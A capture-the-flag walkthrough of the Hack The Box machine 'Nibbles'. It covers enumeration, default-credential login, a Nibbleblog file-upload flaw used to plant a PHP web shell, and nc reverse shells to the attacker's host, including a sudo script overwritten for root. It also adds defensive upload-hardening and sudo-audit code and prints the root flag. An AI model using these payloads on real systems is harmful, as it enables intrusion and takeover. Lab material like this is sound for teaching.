#linux #hackthebox #easy
![[Pasted image 20250611221947.png]]
# Nmap - Enumeration
Initial port scanning result (all ports 1~65,535)
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.10.10.75 -Pn -n --open -p- -oN tcpall
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:53 CDT
Nmap scan report for 10.10.10.75
Host is up (0.051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
```
A service and script scan (`-sCV`) is then run against the two open ports, 22 and 80. The reported OpenSSH 7.2p2 and Apache 2.4.18 builds are the Ubuntu 16.04 packages, which is useful to know when picking exploits later.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.10.10.75 -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:54 CDT
Nmap scan report for 10.10.10.75
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
```
# Footprinting
Browsing to `http://10.10.10.75` gives a page with almost nothing on it, but its source references the `/nibbleblog` directory.
![[Pasted image 20250611205820.png]]
I ran `gobuster` against `http://10.10.10.75/nibbleblog` (with `php` and `txt` extensions) to enumerate directories and files. It turned up the admin login, the installer and updater scripts, a `README`, and the `content/` tree where uploads end up.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 301]
/index.php (Status: 200) [Size: 2987]
/sitemap.php (Status: 200) [Size: 402]
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php (Status: 200) [Size: 302]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php (Status: 200) [Size: 78]
/update.php (Status: 200) [Size: 1622]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/LICENSE.txt (Status: 200) [Size: 35148]
```
`/admin.php` is the Nibbleblog login page. The default username `admin` with the password `nibbles` (simply the box name) worked. Guess by hand here rather than brute-forcing: Nibbleblog's admin login blacklists a source IP after a few failed attempts.
![[Pasted image 20250611211703.png]]
This is how the Nibbleblog dashboard looks after logging in as `admin`:
![[Pasted image 20250611212022.png]]
In the `Settings` tab, scroll all the way to the bottom to find the Nibbleblog version, which is **4.0.3**. This version is affected by CVE-2015-6967, an authenticated arbitrary file upload through the `My image` plugin (fixed in 4.0.5), and that is exactly what the foothold below uses.
![[Pasted image 20250611212148.png]]
In the `Plugins` tab, the `My image` plugin's configuration page accepts a file upload. Since we are already authenticated as admin, this is the natural place to try for an initial foothold.
![[Pasted image 20250611212614.png]]
To find out where uploads land, I first uploaded an ordinary picture (`cat.jpg`). After clicking the `View Blog` button, the `MY IMAGE` section of the blog had been updated with it.
![[Pasted image 20250611213847.png]]
![[Pasted image 20250611213922.png]]
Right-clicking the uploaded image and selecting 'Open image in new tab' gives its URL: `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.jpg`.
So the plugin discards the original base name (`cat.jpg`) and stores the upload as `image` plus whatever extension the client supplied. Nothing validates that extension, and the `content/private/plugins/my_image/` directory is served by Apache like any other.
Based on that, I created a file `cmd.php` containing the one-line web shell `<?php system($_GET['cmd']); ?>` and uploaded it through the same form.
Requesting `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/cmd.php?cmd=id` returned **Not Found**, which is expected given the rename. Changing the filename in the URL to `image.php` executed the command, confirming code execution as the web server user.
![[Pasted image 20250611214933.png]]
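The behaviour above, an upload handler that keeps the attacker's extension, is the whole bug. The following is an added example, not Nibbleblog's code, that reproduces the observed naming rule beside a hardened version of the same step: allowlist the extension, check that the bytes match the claimed image type, and let the server choose the stored name. The sample bytes and the `ALLOWED` table are constructed for the demo.

```python
"""Added example (not Nibbleblog's code): the file-naming rule observed on the box,
beside a hardened upload handler. Sample byte strings are constructed for the demo."""
import secrets
from pathlib import PurePosixPath

# Constructed sample contents; the JPEG one is only a header, enough for a magic-byte check.
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 8
PHP_BYTES = b"<?php system($_GET['cmd']); ?>"  # the web shell used on the page


def vulnerable_target_name(original_name: str) -> str:
    """Reproduce what the My image plugin was observed to do: fix the base name to
    'image' but keep the client-supplied extension. cmd.php therefore becomes
    image.php, which Apache hands to the PHP interpreter."""
    return "image" + PurePosixPath(original_name).suffix


# Allowlist: canonical extension -> magic bytes the content must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def hardened_target_name(original_name: str, content: bytes) -> str:
    """Accept only allowlisted extensions, require the content's magic bytes to agree
    with that extension, and never reuse the client-supplied name: the server picks a
    random base name and its own canonical extension. Raises ValueError on rejection."""
    ext = PurePosixPath(original_name).suffix.lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {ext or '(none)'}")
    if not content.startswith(ALLOWED[ext]):
        raise ValueError("content does not look like the claimed image type")
    return secrets.token_hex(8) + ext


def is_accepted(original_name: str, content: bytes) -> bool:
    """True if the hardened handler would store this upload."""
    try:
        hardened_target_name(original_name, content)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    cases = [("cat.jpg", JPEG_BYTES), ("cmd.php", PHP_BYTES),
             ("shell.php.jpg", JPEG_BYTES), ("image.jpg", PHP_BYTES)]
    for name, data in cases:
        try:
            hardened = "stored as " + hardened_target_name(name, data)
        except ValueError as err:
            hardened = f"rejected ({err})"
        print(f"{name:14} vulnerable -> {vulnerable_target_name(name):10} hardened -> {hardened}")
```

Two points the demo makes that the walkthrough alone does not: a double extension like `shell.php.jpg` is still stored as `.jpg` under a random name, so the client never controls what the server executes; and a `.jpg` whose bytes are PHP is rejected outright. Even with this, the upload directory should be served with script execution disabled, so a bypass of the name check does not become code execution.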
Now for a reverse shell. I replaced the contents of `cmd.php` with a `system()` call that runs a named-pipe `nc` reverse shell (this form is used because the OpenBSD `nc` shipped with Ubuntu has no `-e` option), uploaded it again through the plugin, and started a listener:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat cmd.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f"); ?>
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
```
Requesting `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php` once more runs the payload, and the listener gets a shell as `nibbler`:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 39358
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
```
`user.txt` is in the home directory of `nibbler`:
```bash
nibbler@Nibbles:/home/nibbler$ cat user.txt
cb8c...
```
# PrivEsc
`sudo -l` shows that `nibbler` can run one script as `root`, without a password:
```bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
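What makes this rule dangerous is not the script's content but where it lives. The following is an added example, not from the page or the box, of a small auditor that parses `sudo -l` output and flags rules whose executable the calling user could replace, which is the general condition of which `monitor.sh` is one instance. The `SUDO_L_OUTPUT` string is a constructed copy of the output above, and the writability check is injected as a function so the sample runs offline (the default `os.access` check is what you would use on the target).

```python
"""Added example (not from the page or the box): audit `sudo -l` output for rules whose
executable the calling user could replace. The writability test is injectable so the
constructed sample runs offline; on a real host leave the default os.access check."""
import os
import re
from pathlib import PurePosixPath
from typing import Callable, Dict, Iterator, List, Tuple

# Constructed sample input, shaped like the `sudo -l` output on the box.
SUDO_L_OUTPUT = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# One rule line: "(runas) TAG: TAG: command[, command ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(output: str) -> Iterator[Tuple[str, bool, str]]:
    """Yield (runas, nopasswd, command) for each command in the rules section."""
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                yield m.group("runas"), nopasswd, cmd.strip()


def default_writable(path: str) -> bool:
    return os.access(path, os.W_OK)


def nibbler_home_writable(path: str) -> bool:
    """Offline stand-in for the box: everything under nibbler's home is writable."""
    return path.startswith("/home/nibbler")


def never_writable(path: str) -> bool:
    return False


def risky_sudo_targets(output: str, user: str,
                       writable: Callable[[str], bool] = default_writable) -> List[Dict]:
    """One finding per rule the user could abuse: the rule is ALL, the executable or any
    directory above it is writable (a writable parent is enough, since the file can be
    renamed away and replaced), or the path sits under a location the user controls."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(output):
        exe = cmd.split()[0]
        reasons = []
        if exe == "ALL":
            reasons.append("rule allows any command")
        else:
            if exe.startswith(f"/home/{user}/") or exe.startswith("/tmp/"):
                reasons.append("path is in a user-controlled directory")
            parts = PurePosixPath(exe).parts
            for i in range(1, len(parts) + 1):
                prefix = str(PurePosixPath(*parts[:i]))
                if writable(prefix):
                    reasons.append(f"{prefix} is writable by {user}")
        if reasons:
            findings.append({"runas": runas, "nopasswd": nopasswd,
                             "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in risky_sudo_targets(SUDO_L_OUTPUT, "nibbler", nibbler_home_writable):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"[{tag}] ({f['runas']}) {f['command']}")
        for reason in f["reasons"]:
            print("    -", reason)
```

On the box the `monitor.sh` rule is flagged twice over: it lives under `/home/nibbler`, and every path component from the home directory down is writable by `nibbler`. A rule on `/usr/bin/apt update` with the same checks produces nothing, which is the difference between a sudo rule that is merely broad and one that is a root shell.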
The rule points at `monitor.sh` inside `/home/nibbler/personal/stuff`, a directory that `nibbler` owns and can write to. A `NOPASSWD` rule on a user-writable file is a direct root shell: overwrite `monitor.sh` with a second reverse shell that connects back to a new listener port (and make sure the file stays executable):
```bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1235 >/tmp/f
```
Start a second listener on port 1235, then run `sudo /home/nibbler/personal/stuff/monitor.sh` from the `nibbler` shell.
The callback arrives as `root`, and `root.txt` is in `/root`:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 40764
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
21643b4fbcc4d4e1854077397e4d9ee0
```